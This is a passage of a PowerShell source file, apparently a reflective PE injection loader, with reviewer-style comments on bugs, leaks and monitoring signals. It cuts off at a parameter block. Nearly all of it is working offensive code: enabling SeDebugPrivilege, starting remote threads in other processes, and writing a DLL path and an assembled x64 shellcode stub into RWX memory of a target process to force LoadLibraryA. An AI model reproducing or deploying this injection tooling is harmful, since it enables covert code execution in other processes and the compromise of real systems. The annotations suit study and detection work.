        # 'Runtime, Managed' tells the CLR to supply the delegate ctor/Invoke bodies itself.
        $ConstructorBuilder = $TypeBuilder.DefineConstructor('RTSpecialName, HideBySig, Public', [System.Reflection.CallingConventions]::Standard, $Parameters)
        $ConstructorBuilder.SetImplementationFlags('Runtime, Managed')
        $MethodBuilder = $TypeBuilder.DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', $ReturnType, $Parameters)
        $MethodBuilder.SetImplementationFlags('Runtime, Managed')

        Write-Output $TypeBuilder.CreateType()
    }
  813.  
  814.  
  815.  
    Function Get-ProcAddress
    {
        # Returns the address of an exported function from an already-loaded module.
        # Rather than declaring P/Invoke signatures, it reflects into the framework's own
        # internal Microsoft.Win32.UnsafeNativeMethods type (inside the GAC'd System.dll)
        # and invokes its GetModuleHandle / GetProcAddress wrappers.
        # Arguments: $Module    - module name as GetModuleHandle expects it (e.g. kernel32.dll)
        #            $Procedure - export name
        # Outputs:   [IntPtr] address on the pipeline; IntPtr.Zero if the export is missing
        #            or the module is not loaded (neither case is checked here).
        Param
        (
            [OutputType([IntPtr])]

            [Parameter( Position = 0, Mandatory = $True )]
            [String]
            $Module,

            [Parameter( Position = 1, Mandatory = $True )]
            [String]
            $Procedure
        )


        # Locate System.dll among the loaded assemblies by file name.
        $SystemAssembly = [AppDomain]::CurrentDomain.GetAssemblies() |
            Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('System.dll') }
        $UnsafeNativeMethods = $SystemAssembly.GetType('Microsoft.Win32.UnsafeNativeMethods')

        $GetModuleHandle = $UnsafeNativeMethods.GetMethod('GetModuleHandle')

        # The name-only lookup presumably fails with an ambiguous-match error on framework
        # versions that expose several GetProcAddress overloads; the fallback pins the
        # (HandleRef, string) overload explicitly.
        Try
        {
            $GetProcAddress = $UnsafeNativeMethods.GetMethod('GetProcAddress')
        }
        Catch
        {
            $GetProcAddress = $UnsafeNativeMethods.GetMethod('GetProcAddress',
                                                            [reflection.bindingflags] "Public,Static",
                                                            $null,
                                                            [System.Reflection.CallingConventions]::Any,
                                                            @((New-Object System.Runtime.InteropServices.HandleRef).GetType(),
                                                            [string]),
                                                            $null)
        }


        # $Kern32Handle is the handle of whatever $Module names, not only kernel32.
        # HandleRef needs a wrapper object to keep alive; a throwaway IntPtr serves.
        $Kern32Handle = $GetModuleHandle.Invoke($null, @($Module))
        $tmpPtr = New-Object IntPtr
        $HandleRef = New-Object System.Runtime.InteropServices.HandleRef($tmpPtr, $Kern32Handle)


        Write-Output $GetProcAddress.Invoke($null, @([System.Runtime.InteropServices.HandleRef]$HandleRef, $Procedure))
    }
  861.  
  862.  
    Function Enable-SeDebugPrivilege
    {
        # Attempts to enable SeDebugPrivilege on the current thread's token (impersonating
        # self first if the thread has no token of its own), so later OpenProcess calls can
        # reach processes the caller would not otherwise be allowed to open.
        # Arguments: $Win32Functions - delegates from Get-Win32Functions
        #            $Win32Types     - struct types (LUID, TOKEN_PRIVILEGES) from Get-Win32Types
        #            $Win32Constants - TOKEN_QUERY, TOKEN_ADJUST_PRIVILEGES, SE_PRIVILEGE_ENABLED,
        #                              ERROR_NO_TOKEN
        # Returns:   nothing
        # Raises:    on failure of GetCurrentThread, OpenThreadToken, ImpersonateSelf or
        #            LookupPrivilegeValue. It does NOT raise, or even warn, when
        #            AdjustTokenPrivileges fails — see the empty block below — so a caller
        #            cannot tell from this function whether the privilege is actually held.
        # Resource notes (visible in this body): $PLuid (AllocHGlobal) is never freed and
        # $ThreadToken is never closed; only $TokenPrivilegesMem is released.
        Param(
        [Parameter(Position = 1, Mandatory = $true)]
        [System.Object]
        $Win32Functions,

        [Parameter(Position = 2, Mandatory = $true)]
        [System.Object]
        $Win32Types,

        [Parameter(Position = 3, Mandatory = $true)]
        [System.Object]
        $Win32Constants
        )

        [IntPtr]$ThreadHandle = $Win32Functions.GetCurrentThread.Invoke()
        if ($ThreadHandle -eq [IntPtr]::Zero)
        {
            Throw "Unable to get the handle to the current thread"
        }

        [IntPtr]$ThreadToken = [IntPtr]::Zero
        [Bool]$Result = $Win32Functions.OpenThreadToken.Invoke($ThreadHandle, $Win32Constants.TOKEN_QUERY -bor $Win32Constants.TOKEN_ADJUST_PRIVILEGES, $false, [Ref]$ThreadToken)
        if ($Result -eq $false)
        {
            # NOTE(review): the delegate has no SetLastError marshalling, so this error code
            # may be stale — confirm before relying on the ERROR_NO_TOKEN branch.
            $ErrorCode = [System.Runtime.InteropServices.Marshal]::GetLastWin32Error()
            if ($ErrorCode -eq $Win32Constants.ERROR_NO_TOKEN)
            {
                # No thread token yet: impersonate self so the thread gets a copy of the
                # process token. 3 is SECURITY_IMPERSONATION_LEVEL::SecurityDelegation
                # (SecurityImpersonation would be 2).
                $Result = $Win32Functions.ImpersonateSelf.Invoke(3)
                if ($Result -eq $false)
                {
                    Throw "Unable to impersonate self"
                }

                $Result = $Win32Functions.OpenThreadToken.Invoke($ThreadHandle, $Win32Constants.TOKEN_QUERY -bor $Win32Constants.TOKEN_ADJUST_PRIVILEGES, $false, [Ref]$ThreadToken)
                if ($Result -eq $false)
                {
                    Throw "Unable to OpenThreadToken."
                }
            }
            else
            {
                Throw "Unable to OpenThreadToken. Error code: $ErrorCode"
            }
        }

        # Resolve the LUID for SeDebugPrivilege into unmanaged memory (leaked: no FreeHGlobal).
        [IntPtr]$PLuid = [System.Runtime.InteropServices.Marshal]::AllocHGlobal([System.Runtime.InteropServices.Marshal]::SizeOf([Type]$Win32Types.LUID))
        $Result = $Win32Functions.LookupPrivilegeValue.Invoke($null, "SeDebugPrivilege", $PLuid)
        if ($Result -eq $false)
        {
            Throw "Unable to call LookupPrivilegeValue"
        }

        # Build a single-entry TOKEN_PRIVILEGES: { PrivilegeCount = 1, { Luid, SE_PRIVILEGE_ENABLED } }.
        # PtrToStructure on freshly allocated (uninitialised) memory is used only to obtain
        # a managed instance of the dynamically emitted struct type before filling it in.
        [UInt32]$TokenPrivSize = [System.Runtime.InteropServices.Marshal]::SizeOf([Type]$Win32Types.TOKEN_PRIVILEGES)
        [IntPtr]$TokenPrivilegesMem = [System.Runtime.InteropServices.Marshal]::AllocHGlobal($TokenPrivSize)
        $TokenPrivileges = [System.Runtime.InteropServices.Marshal]::PtrToStructure($TokenPrivilegesMem, [Type]$Win32Types.TOKEN_PRIVILEGES)
        $TokenPrivileges.PrivilegeCount = 1
        $TokenPrivileges.Privileges.Luid = [System.Runtime.InteropServices.Marshal]::PtrToStructure($PLuid, [Type]$Win32Types.LUID)
        $TokenPrivileges.Privileges.Attributes = $Win32Constants.SE_PRIVILEGE_ENABLED
        [System.Runtime.InteropServices.Marshal]::StructureToPtr($TokenPrivileges, $TokenPrivilegesMem, $true)

        $Result = $Win32Functions.AdjustTokenPrivileges.Invoke($ThreadToken, $false, $TokenPrivilegesMem, $TokenPrivSize, [IntPtr]::Zero, [IntPtr]::Zero)
        $ErrorCode = [System.Runtime.InteropServices.Marshal]::GetLastWin32Error()
        # Empty branch: both an outright failure and the TRUE-with-ERROR_NOT_ALL_ASSIGNED case
        # (AdjustTokenPrivileges succeeds even when the token does not hold the privilege)
        # are silently dropped here. Any decision about whether the privilege was granted
        # has to be made by the caller from the effects of later API calls.
        if (($Result -eq $false) -or ($ErrorCode -ne 0))
        {

        }

        [System.Runtime.InteropServices.Marshal]::FreeHGlobal($TokenPrivilegesMem)
    }
  934.  
  935.  
    Function Create-RemoteThread
    {
        # Starts a thread at $StartAddress inside the process identified by $ProcessHandle
        # and returns the new thread handle. On 6.0 <= OS version < 6.2 it goes through
        # ntdll!NtCreateThreadEx (bound by Get-Win32Functions under the identical version
        # test); everywhere else it uses kernel32!CreateRemoteThread.
        # Arguments: $ProcessHandle - handle with thread-creation rights on the target
        #            $StartAddress  - entry point, valid in the target's address space
        #            $ArgumentPtr   - lpParameter passed to the thread (default IntPtr.Zero)
        #            $Win32Functions - delegates from Get-Win32Functions
        # Returns:   [IntPtr] thread handle (never IntPtr.Zero — that case raises)
        # Raises:    on a null handle from either API; note the two branches use different
        #            mechanisms (Throw vs Write-Error -ErrorAction Stop).
        # NOTE: the returned handle is not closed here; ownership passes to the caller.
        Param(
        [Parameter(Position = 1, Mandatory = $true)]
        [IntPtr]
        $ProcessHandle,

        [Parameter(Position = 2, Mandatory = $true)]
        [IntPtr]
        $StartAddress,

        [Parameter(Position = 3, Mandatory = $false)]
        [IntPtr]
        $ArgumentPtr = [IntPtr]::Zero,

        [Parameter(Position = 4, Mandatory = $true)]
        [System.Object]
        $Win32Functions
        )

        [IntPtr]$RemoteThreadHandle = [IntPtr]::Zero

        $OSVersion = [Environment]::OSVersion.Version

        if (($OSVersion -ge (New-Object 'Version' 6,0)) -and ($OSVersion -lt (New-Object 'Version' 6,2)))
        {

            # 0x1FFFFF is THREAD_ALL_ACCESS on Vista and later. The remaining numeric
            # arguments (0, 0xffff, 0xffff) are the loader's own choice of stack/flag
            # values for this undocumented call; their meaning is not verifiable here.
            # NOTE(review): $LastError comes from a delegate without SetLastError — may be stale.
            $RetVal= $Win32Functions.NtCreateThreadEx.Invoke([Ref]$RemoteThreadHandle, 0x1FFFFF, [IntPtr]::Zero, $ProcessHandle, $StartAddress, $ArgumentPtr, $false, 0, 0xffff, 0xffff, [IntPtr]::Zero)
            $LastError = [System.Runtime.InteropServices.Marshal]::GetLastWin32Error()
            if ($RemoteThreadHandle -eq [IntPtr]::Zero)
            {
                Throw "Error in NtCreateThreadEx. Return value: $RetVal. LastError: $LastError"
            }
        }

        else
        {

            # dwStackSize = 0xFFFF, default security attributes, no creation flags, no thread id.
            $RemoteThreadHandle = $Win32Functions.CreateRemoteThread.Invoke($ProcessHandle, [IntPtr]::Zero, [UIntPtr][UInt64]0xFFFF, $StartAddress, $ArgumentPtr, 0, [IntPtr]::Zero)
        }

        if ($RemoteThreadHandle -eq [IntPtr]::Zero)
        {
            Write-Error "Error creating remote thread, thread handle is null" -ErrorAction Stop
        }

        return $RemoteThreadHandle
    }
  984.  
  985.  
  986.  
    Function Get-ImageNtHeaders
    {
        # Reads the IMAGE_NT_HEADERS of a PE image that is already in memory at $PEHandle
        # and reports whether it is a PE32+ (64-bit) or PE32 image.
        # Arguments: $PEHandle   - address of the IMAGE_DOS_HEADER (start of the image)
        #            $Win32Types - struct types IMAGE_DOS_HEADER / IMAGE_NT_HEADERS32 / 64
        # Returns:   object with NtHeadersPtr, IMAGE_NT_HEADERS (32- or 64-bit struct) and
        #            PE64Bit ([Bool])
        # Raises:    if the NT signature is not 0x00004550 ("PE\0\0").
        # Robustness note: e_lfanew is taken from the image unvalidated — there is no 'MZ'
        # (e_magic) check and no check that e_lfanew stays inside the buffer the caller
        # allocated, so a malformed header makes PtrToStructure read out of bounds before
        # the signature test can reject it.
        Param(
        [Parameter(Position = 0, Mandatory = $true)]
        [IntPtr]
        $PEHandle,

        [Parameter(Position = 1, Mandatory = $true)]
        [System.Object]
        $Win32Types
        )

        $NtHeadersInfo = New-Object System.Object


        $dosHeader = [System.Runtime.InteropServices.Marshal]::PtrToStructure($PEHandle, [Type]$Win32Types.IMAGE_DOS_HEADER)


        # NtHeaders = base + e_lfanew, computed with the unsigned add helper.
        [IntPtr]$NtHeadersPtr = [IntPtr](Add-SignedIntAsUnsigned ([Int64]$PEHandle) ([Int64][UInt64]$dosHeader.e_lfanew))
        $NtHeadersInfo | Add-Member -MemberType NoteProperty -Name NtHeadersPtr -Value $NtHeadersPtr
        # The 64-bit layout is read first; Signature and OptionalHeader.Magic sit at the
        # same offsets in both layouts, so this is safe for deciding the real width.
        $imageNtHeaders64 = [System.Runtime.InteropServices.Marshal]::PtrToStructure($NtHeadersPtr, [Type]$Win32Types.IMAGE_NT_HEADERS64)


        if ($imageNtHeaders64.Signature -ne 0x00004550)
        {
            throw "Invalid IMAGE_NT_HEADER signature."
        }

        # String comparison works here presumably because Magic is declared as an enum
        # member in the emitted struct type (defined outside this function) — verify there.
        if ($imageNtHeaders64.OptionalHeader.Magic -eq 'IMAGE_NT_OPTIONAL_HDR64_MAGIC')
        {
            $NtHeadersInfo | Add-Member -MemberType NoteProperty -Name IMAGE_NT_HEADERS -Value $imageNtHeaders64
            $NtHeadersInfo | Add-Member -MemberType NoteProperty -Name PE64Bit -Value $true
        }
        else
        {
            # $ImageNtHeaders32 / $imageNtHeaders32 are the same variable (PowerShell
            # variable names are case-insensitive).
            $ImageNtHeaders32 = [System.Runtime.InteropServices.Marshal]::PtrToStructure($NtHeadersPtr, [Type]$Win32Types.IMAGE_NT_HEADERS32)
            $NtHeadersInfo | Add-Member -MemberType NoteProperty -Name IMAGE_NT_HEADERS -Value $imageNtHeaders32
            $NtHeadersInfo | Add-Member -MemberType NoteProperty -Name PE64Bit -Value $false
        }

        return $NtHeadersInfo
    }
  1029.  
  1030.  
  1031.  
    Function Get-PEBasicInfo
    {
        # Extracts a few optional-header fields from a PE held in a managed byte array:
        # copies the bytes to a temporary unmanaged buffer, parses the headers with
        # Get-ImageNtHeaders, and frees the buffer again.
        # Arguments: $PEBytes    - raw file image
        #            $Win32Types - struct types passed through to Get-ImageNtHeaders
        # Returns:   object with PE64Bit, OriginalImageBase, SizeOfImage, SizeOfHeaders and
        #            DllCharacteristics
        # Raises:    whatever Get-ImageNtHeaders raises for a malformed image.
        # Resource note: there is no try/finally, so if Get-ImageNtHeaders throws the
        # AllocHGlobal buffer below is never freed.
        Param(
        [Parameter( Position = 0, Mandatory = $true )]
        [Byte[]]
        $PEBytes,

        [Parameter(Position = 1, Mandatory = $true)]
        [System.Object]
        $Win32Types
        )

        $PEInfo = New-Object System.Object


        # Temporary unmanaged copy sized exactly to the input; header offsets read from the
        # image are not checked against this size (see Get-ImageNtHeaders).
        [IntPtr]$UnmanagedPEBytes = [System.Runtime.InteropServices.Marshal]::AllocHGlobal($PEBytes.Length)
        [System.Runtime.InteropServices.Marshal]::Copy($PEBytes, 0, $UnmanagedPEBytes, $PEBytes.Length) | Out-Null


        $NtHeadersInfo = Get-ImageNtHeaders -PEHandle $UnmanagedPEBytes -Win32Types $Win32Types


        $PEInfo | Add-Member -MemberType NoteProperty -Name 'PE64Bit' -Value ($NtHeadersInfo.PE64Bit)
        $PEInfo | Add-Member -MemberType NoteProperty -Name 'OriginalImageBase' -Value ($NtHeadersInfo.IMAGE_NT_HEADERS.OptionalHeader.ImageBase)
        $PEInfo | Add-Member -MemberType NoteProperty -Name 'SizeOfImage' -Value ($NtHeadersInfo.IMAGE_NT_HEADERS.OptionalHeader.SizeOfImage)
        $PEInfo | Add-Member -MemberType NoteProperty -Name 'SizeOfHeaders' -Value ($NtHeadersInfo.IMAGE_NT_HEADERS.OptionalHeader.SizeOfHeaders)
        $PEInfo | Add-Member -MemberType NoteProperty -Name 'DllCharacteristics' -Value ($NtHeadersInfo.IMAGE_NT_HEADERS.OptionalHeader.DllCharacteristics)


        [System.Runtime.InteropServices.Marshal]::FreeHGlobal($UnmanagedPEBytes)

        return $PEInfo
    }
  1065.  
  1066.  
  1067.  
  1068.  
    Function Get-PEDetailedInfo
    {
        <#
        .SYNOPSIS
        Builds the PEInfo object for an image that is already present at $PEHandle.

        .DESCRIPTION
        Re-parses the NT headers at the given address, records where the section
        header table starts, and classifies the image as 'DLL' or 'EXE' from
        FileHeader.Characteristics. Throws if the handle is null/zero or the image
        carries neither characteristic flag.

        .PARAMETER PEHandle
        Address of the PE headers in memory (must not be IntPtr.Zero).

        .PARAMETER Win32Types
        Object carrying the dynamically emitted IMAGE_* struct types.

        .PARAMETER Win32Constants
        Object carrying the IMAGE_FILE_* constant values used for the classification.

        .OUTPUTS
        PSObject with NoteProperties PEHandle, IMAGE_NT_HEADERS, NtHeadersPtr,
        PE64Bit, SizeOfImage, SectionHeaderPtr and FileType.
        Note that EffectivePEHandle, which other functions in this script read from
        PEInfo, is NOT set here; presumably the caller adds it. TODO confirm.
        #>
        Param(
        [Parameter( Position = 0, Mandatory = $true)]
        [IntPtr]
        $PEHandle,

        [Parameter(Position = 1, Mandatory = $true)]
        [System.Object]
        $Win32Types,

        [Parameter(Position = 2, Mandatory = $true)]
        [System.Object]
        $Win32Constants
        )

        if ($PEHandle -eq $null -or $PEHandle -eq [IntPtr]::Zero)
        {
            throw 'PEHandle is null or IntPtr.Zero'
        }

        $PEInfo = New-Object System.Object

        # Same header walk as Get-PEBasicInfo, but against the live mapping.
        $NtHeadersInfo = Get-ImageNtHeaders -PEHandle $PEHandle -Win32Types $Win32Types

        $PEInfo | Add-Member -MemberType NoteProperty -Name PEHandle -Value $PEHandle
        $PEInfo | Add-Member -MemberType NoteProperty -Name IMAGE_NT_HEADERS -Value ($NtHeadersInfo.IMAGE_NT_HEADERS)
        $PEInfo | Add-Member -MemberType NoteProperty -Name NtHeadersPtr -Value ($NtHeadersInfo.NtHeadersPtr)
        $PEInfo | Add-Member -MemberType NoteProperty -Name PE64Bit -Value ($NtHeadersInfo.PE64Bit)
        $PEInfo | Add-Member -MemberType NoteProperty -Name 'SizeOfImage' -Value ($NtHeadersInfo.IMAGE_NT_HEADERS.OptionalHeader.SizeOfImage)

        # Section headers are taken to start immediately after the NT headers
        # struct. This uses the fixed marshalled size of IMAGE_NT_HEADERS64/32
        # rather than FileHeader.SizeOfOptionalHeader, so a non-standard optional
        # header size would put SectionHeaderPtr in the wrong place.
        # Add-SignedIntAsUnsigned is a helper defined elsewhere in the script.
        if ($PEInfo.PE64Bit -eq $true)
        {
            [IntPtr]$SectionHeaderPtr = [IntPtr](Add-SignedIntAsUnsigned ([Int64]$PEInfo.NtHeadersPtr) ([System.Runtime.InteropServices.Marshal]::SizeOf([Type]$Win32Types.IMAGE_NT_HEADERS64)))
            $PEInfo | Add-Member -MemberType NoteProperty -Name SectionHeaderPtr -Value $SectionHeaderPtr
        }
        else
        {
            [IntPtr]$SectionHeaderPtr = [IntPtr](Add-SignedIntAsUnsigned ([Int64]$PEInfo.NtHeadersPtr) ([System.Runtime.InteropServices.Marshal]::SizeOf([Type]$Win32Types.IMAGE_NT_HEADERS32)))
            $PEInfo | Add-Member -MemberType NoteProperty -Name SectionHeaderPtr -Value $SectionHeaderPtr
        }

        # The DLL test runs first, so an image with both IMAGE_FILE_DLL and
        # IMAGE_FILE_EXECUTABLE_IMAGE set is classified as 'DLL'.
        if (($NtHeadersInfo.IMAGE_NT_HEADERS.FileHeader.Characteristics -band $Win32Constants.IMAGE_FILE_DLL) -eq $Win32Constants.IMAGE_FILE_DLL)
        {
            $PEInfo | Add-Member -MemberType NoteProperty -Name FileType -Value 'DLL'
        }
        elseif (($NtHeadersInfo.IMAGE_NT_HEADERS.FileHeader.Characteristics -band $Win32Constants.IMAGE_FILE_EXECUTABLE_IMAGE) -eq $Win32Constants.IMAGE_FILE_EXECUTABLE_IMAGE)
        {
            $PEInfo | Add-Member -MemberType NoteProperty -Name FileType -Value 'EXE'
        }
        else
        {
            Throw "PE file is not an EXE or DLL"
        }

        return $PEInfo
    }
  1128.  
  1129.  
    Function Import-DllInRemoteProcess
    {
        <#
        .SYNOPSIS
        Loads a DLL by path inside another process and returns its module base there.

        .DESCRIPTION
        Writes the ANSI DLL path into memory allocated in the target process, then
        has the target call LoadLibraryA on it. On 64-bit the call is made through a
        small hand-assembled stub placed in PAGE_EXECUTE_READWRITE memory that stores
        LoadLibraryA's result to a remote slot which is read back afterwards; on
        32-bit LoadLibraryA itself is used as the remote thread's start routine and
        the module handle is taken from the thread exit code.

        From a monitoring standpoint this function is the
        VirtualAllocEx -> WriteProcessMemory -> CreateRemoteThread sequence against a
        foreign process, with an RWX allocation in the 64-bit path; those API calls
        (and the remote thread whose start address is not backed by an image) are
        the observable events.

        .PARAMETER RemoteProcHandle
        Handle to the target process, with rights sufficient for the calls above.

        .PARAMETER ImportDllPathPtr
        Pointer (in this process) to the NUL-terminated ANSI path of the DLL to load.

        .OUTPUTS
        [IntPtr] base address of the DLL inside the target process.

        .NOTES
        Reads $PEInfo, $Win32Functions and $Win32Constants from the enclosing scope;
        they are not parameters.
        #>
        Param(
        [Parameter(Position=0, Mandatory=$true)]
        [IntPtr]
        $RemoteProcHandle,

        [Parameter(Position=1, Mandatory=$true)]
        [IntPtr]
        $ImportDllPathPtr
        )

        $PtrSize = [System.Runtime.InteropServices.Marshal]::SizeOf([Type][IntPtr])

        # Path length + 1 for the terminating NUL.
        $ImportDllPath = [System.Runtime.InteropServices.Marshal]::PtrToStringAnsi($ImportDllPathPtr)
        $DllPathSize = [UIntPtr][UInt64]([UInt64]$ImportDllPath.Length + 1)
        $RImportDllPathPtr = $Win32Functions.VirtualAllocEx.Invoke($RemoteProcHandle, [IntPtr]::Zero, $DllPathSize, $Win32Constants.MEM_COMMIT -bor $Win32Constants.MEM_RESERVE, $Win32Constants.PAGE_READWRITE)
        if ($RImportDllPathPtr -eq [IntPtr]::Zero)
        {
            Throw "Unable to allocate memory in the remote process"
        }

        [UIntPtr]$NumBytesWritten = [UIntPtr]::Zero
        $Success = $Win32Functions.WriteProcessMemory.Invoke($RemoteProcHandle, $RImportDllPathPtr, $ImportDllPathPtr, $DllPathSize, [Ref]$NumBytesWritten)

        if ($Success -eq $false)
        {
            Throw "Unable to write DLL path to remote process memory"
        }
        if ($DllPathSize -ne $NumBytesWritten)
        {
            Throw "Didn't write the expected amount of bytes when writing a DLL path to load to the remote process"
        }

        # LoadLibraryA is resolved in THIS process and the address is then used in
        # the target; this assumes kernel32 is mapped at the same base in both
        # processes (and the same bitness). TODO confirm that the caller enforces it.
        $Kernel32Handle = $Win32Functions.GetModuleHandle.Invoke("kernel32.dll")
        $LoadLibraryAAddr = $Win32Functions.GetProcAddress.Invoke($Kernel32Handle, "LoadLibraryA")

        [IntPtr]$DllAddress = [IntPtr]::Zero

        # The branch is chosen by the bitness of the PE being loaded ($PEInfo),
        # not by an explicit check of the target process.
        if ($PEInfo.PE64Bit -eq $true)
        {
            # Remote slot that the stub writes LoadLibraryA's return value into.
            # (Reuses $DllPathSize as the size; only $PtrSize bytes are read back.)
            $LoadLibraryARetMem = $Win32Functions.VirtualAllocEx.Invoke($RemoteProcHandle, [IntPtr]::Zero, $DllPathSize, $Win32Constants.MEM_COMMIT -bor $Win32Constants.MEM_RESERVE, $Win32Constants.PAGE_READWRITE)
            if ($LoadLibraryARetMem -eq [IntPtr]::Zero)
            {
                Throw "Unable to allocate memory in the remote process for the return value of LoadLibraryA"
            }

            # Fixed opcode runs of the x64 stub. The three pointer-sized values
            # spliced between them below are, in order: the remote DLL-path
            # pointer, the LoadLibraryA address, and the remote return slot.
            $LoadLibrarySC1 = @(0x53, 0x48, 0x89, 0xe3, 0x48, 0x83, 0xec, 0x20, 0x66, 0x83, 0xe4, 0xc0, 0x48, 0xb9)
            $LoadLibrarySC2 = @(0x48, 0xba)
            $LoadLibrarySC3 = @(0xff, 0xd2, 0x48, 0xba)
            $LoadLibrarySC4 = @(0x48, 0x89, 0x02, 0x48, 0x89, 0xdc, 0x5b, 0xc3)

            # Assemble the stub in local unmanaged memory first, advancing
            # $SCPSMem as each piece is written; $SCPSMemOriginal keeps the start.
            # NOTE(review): this AllocHGlobal buffer is never FreeHGlobal'd.
            $SCLength = $LoadLibrarySC1.Length + $LoadLibrarySC2.Length + $LoadLibrarySC3.Length + $LoadLibrarySC4.Length + ($PtrSize * 3)
            $SCPSMem = [System.Runtime.InteropServices.Marshal]::AllocHGlobal($SCLength)
            $SCPSMemOriginal = $SCPSMem

            Write-BytesToMemory -Bytes $LoadLibrarySC1 -MemoryAddress $SCPSMem
            $SCPSMem = Add-SignedIntAsUnsigned $SCPSMem ($LoadLibrarySC1.Length)
            [System.Runtime.InteropServices.Marshal]::StructureToPtr($RImportDllPathPtr, $SCPSMem, $false)
            $SCPSMem = Add-SignedIntAsUnsigned $SCPSMem ($PtrSize)
            Write-BytesToMemory -Bytes $LoadLibrarySC2 -MemoryAddress $SCPSMem
            $SCPSMem = Add-SignedIntAsUnsigned $SCPSMem ($LoadLibrarySC2.Length)
            [System.Runtime.InteropServices.Marshal]::StructureToPtr($LoadLibraryAAddr, $SCPSMem, $false)
            $SCPSMem = Add-SignedIntAsUnsigned $SCPSMem ($PtrSize)
            Write-BytesToMemory -Bytes $LoadLibrarySC3 -MemoryAddress $SCPSMem
            $SCPSMem = Add-SignedIntAsUnsigned $SCPSMem ($LoadLibrarySC3.Length)
            [System.Runtime.InteropServices.Marshal]::StructureToPtr($LoadLibraryARetMem, $SCPSMem, $false)
            $SCPSMem = Add-SignedIntAsUnsigned $SCPSMem ($PtrSize)
            Write-BytesToMemory -Bytes $LoadLibrarySC4 -MemoryAddress $SCPSMem
            $SCPSMem = Add-SignedIntAsUnsigned $SCPSMem ($LoadLibrarySC4.Length)

            # Stub goes into a fresh RWX region in the target.
            $RSCAddr = $Win32Functions.VirtualAllocEx.Invoke($RemoteProcHandle, [IntPtr]::Zero, [UIntPtr][UInt64]$SCLength, $Win32Constants.MEM_COMMIT -bor $Win32Constants.MEM_RESERVE, $Win32Constants.PAGE_EXECUTE_READWRITE)
            if ($RSCAddr -eq [IntPtr]::Zero)
            {
                Throw "Unable to allocate memory in the remote process for shellcode"
            }

            $Success = $Win32Functions.WriteProcessMemory.Invoke($RemoteProcHandle, $RSCAddr, $SCPSMemOriginal, [UIntPtr][UInt64]$SCLength, [Ref]$NumBytesWritten)
            if (($Success -eq $false) -or ([UInt64]$NumBytesWritten -ne [UInt64]$SCLength))
            {
                Throw "Unable to write shellcode to remote process memory."
            }

            # Run the stub and wait up to 20 s. Any non-zero wait result (timeout
            # included) is treated as failure. NOTE(review): the message says
            # "GetProcAddress" but this is the LoadLibraryA stub (copy/paste from
            # Get-RemoteProcAddress); the thread handle is also never closed here.
            $RThreadHandle = Create-RemoteThread -ProcessHandle $RemoteProcHandle -StartAddress $RSCAddr -Win32Functions $Win32Functions
            $Result = $Win32Functions.WaitForSingleObject.Invoke($RThreadHandle, 20000)
            if ($Result -ne 0)
            {
                Throw "Call to CreateRemoteThread to call GetProcAddress failed."
            }

            # Read the pointer the stub stored into the remote return slot.
            # NOTE(review): unlike Get-RemoteProcAddress, the number of bytes read
            # is not checked, and $ReturnValMem is never freed.
            [IntPtr]$ReturnValMem = [System.Runtime.InteropServices.Marshal]::AllocHGlobal($PtrSize)
            $Result = $Win32Functions.ReadProcessMemory.Invoke($RemoteProcHandle, $LoadLibraryARetMem, $ReturnValMem, [UIntPtr][UInt64]$PtrSize, [Ref]$NumBytesWritten)
            if ($Result -eq $false)
            {
                Throw "Call to ReadProcessMemory failed"
            }
            [IntPtr]$DllAddress = [System.Runtime.InteropServices.Marshal]::PtrToStructure($ReturnValMem, [Type][IntPtr])

            $Win32Functions.VirtualFreeEx.Invoke($RemoteProcHandle, $LoadLibraryARetMem, [UIntPtr][UInt64]0, $Win32Constants.MEM_RELEASE) | Out-Null
            $Win32Functions.VirtualFreeEx.Invoke($RemoteProcHandle, $RSCAddr, [UIntPtr][UInt64]0, $Win32Constants.MEM_RELEASE) | Out-Null
        }
        else
        {
            # 32-bit: LoadLibraryA is the thread start routine and the remote path
            # pointer is its single argument; the HMODULE comes back as the thread
            # exit code. Same copy/paste error text and unclosed handle as above.
            [IntPtr]$RThreadHandle = Create-RemoteThread -ProcessHandle $RemoteProcHandle -StartAddress $LoadLibraryAAddr -ArgumentPtr $RImportDllPathPtr -Win32Functions $Win32Functions
            $Result = $Win32Functions.WaitForSingleObject.Invoke($RThreadHandle, 20000)
            if ($Result -ne 0)
            {
                Throw "Call to CreateRemoteThread to call GetProcAddress failed."
            }

            # An exit code of 0 means LoadLibraryA returned NULL, so it is
            # reported as a failure together with a failed GetExitCodeThread.
            [Int32]$ExitCode = 0
            $Result = $Win32Functions.GetExitCodeThread.Invoke($RThreadHandle, [Ref]$ExitCode)
            if (($Result -eq 0) -or ($ExitCode -eq 0))
            {
                Throw "Call to GetExitCodeThread failed"
            }

            [IntPtr]$DllAddress = [IntPtr]$ExitCode
        }

        # The path buffer is released in both branches; the stub/return-slot
        # regions are released only in the 64-bit branch where they exist.
        $Win32Functions.VirtualFreeEx.Invoke($RemoteProcHandle, $RImportDllPathPtr, [UIntPtr][UInt64]0, $Win32Constants.MEM_RELEASE) | Out-Null

        return $DllAddress
    }
  1260.  
  1261.  
    Function Get-RemoteProcAddress
    {
        <#
        .SYNOPSIS
        Resolves an export of a module that lives in another process, by name or
        ordinal, and returns its address in that process.

        .DESCRIPTION
        Mirrors Import-DllInRemoteProcess: a stub is assembled locally with the
        remote module handle, the name/ordinal argument, the GetProcAddress address
        and a remote result slot embedded in it, copied into a PAGE_EXECUTE_READWRITE
        allocation in the target, run on a remote thread, and the result slot is read
        back. Both a 64-bit and a 32-bit stub variant are provided, selected by
        $PEInfo.PE64Bit.

        .PARAMETER RemoteProcHandle
        Handle to the target process.

        .PARAMETER RemoteDllHandle
        Base of the module in the target process (as returned by Import-DllInRemoteProcess).

        .PARAMETER FunctionNamePtr
        Local pointer to the ANSI export name, or, when $LoadByOrdinal is set, the
        ordinal value itself cast to IntPtr (it is passed through unchanged).

        .PARAMETER LoadByOrdinal
        $true to resolve by ordinal, $false to resolve by name.

        .OUTPUTS
        [IntPtr] address of the export inside the target process.

        .NOTES
        Reads $PEInfo, $Win32Functions and $Win32Constants from the enclosing scope.
        #>
        Param(
        [Parameter(Position=0, Mandatory=$true)]
        [IntPtr]
        $RemoteProcHandle,

        [Parameter(Position=1, Mandatory=$true)]
        [IntPtr]
        $RemoteDllHandle,

        [Parameter(Position=2, Mandatory=$true)]
        [IntPtr]
        $FunctionNamePtr,

        [Parameter(Position=3, Mandatory=$true)]
        [Bool]
        $LoadByOrdinal
        )

